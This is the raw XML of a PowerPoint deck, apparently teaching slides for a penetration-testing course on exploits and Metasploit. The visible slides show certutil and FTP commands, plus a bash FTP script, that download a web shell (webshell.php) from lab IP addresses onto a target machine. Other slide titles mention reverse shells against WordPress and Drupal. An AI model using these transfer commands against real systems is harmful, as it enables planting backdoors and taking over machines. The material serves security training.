            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'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932" y="1560928"/>
            <a:ext cx="1146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Windows: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478972"/>
            <a:ext cx="10220325" cy="896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File Transfers – Windows File Transfers - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>HTTP,PowerShell,Certutil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1932" y="3467922"/>
            <a:ext cx="11888288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certutil.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -f http://192.168.56.101/webshell.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php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4048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2123" y="1960166"/>
            <a:ext cx="1188828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echo open 192.168.56.108 &gt; ftp.txt &amp; echo USER anonymous &gt;&gt; ftp.txt &amp; echo ftp &gt;&gt; ftp.txt &amp; echo bin &gt;&gt; ftp.txt &amp; echo GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&gt; ftp.txt &amp; echo bye &gt;&gt; ftp.txt &amp; ftp -v -n -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s:ftp.txt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2123" y="1656722"/>
            <a:ext cx="187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FTP On Windows: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2123" y="3098499"/>
            <a:ext cx="1483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FTP On Linux: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2123" y="3478208"/>
            <a:ext cx="1188828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#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HOST=192.168.x.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>USER=anonymous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PASSWORD="1"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ftp -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $HOST &lt;&lt;EOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user $USER $PASSWORD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cd /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EOF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478972"/>
            <a:ext cx="10220325" cy="8968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800" dirty="0"/>
              <a:t>File Transfers – Windows-Linux File Transfers - FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33765415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ersonalizar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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="22ff5d0a66fe176ebb507ab62aa1c3de">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a8df32aad410ccae5763d30ffd13a2a2" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd235044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e1bb88-64f6-4f17-8933-73fd235044f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53836D2-4D45-4E08-8F69-C2732352E7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98F3E9-EE09-4D7E-A0FA-7609E980F74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0431D152-A289-4368-82A1-D04450AB2D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e1bb88-64f6-4f17-8933-73fd235044f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11490</TotalTime>
  <Words>649</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>68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1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Personalizar design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Command injection</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – CMS - Wordpress Fuzzing And Reverse Shell</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – CMS -Drupal  ReverseShell</vt:lpstr>
      <vt:lpstr>Transferência de Arquivos</vt:lpstr>
      <vt:lpstr>File Transfers – HTTP SSH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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>ישראל מאיר רוזנברג</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-30T11:00:35Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>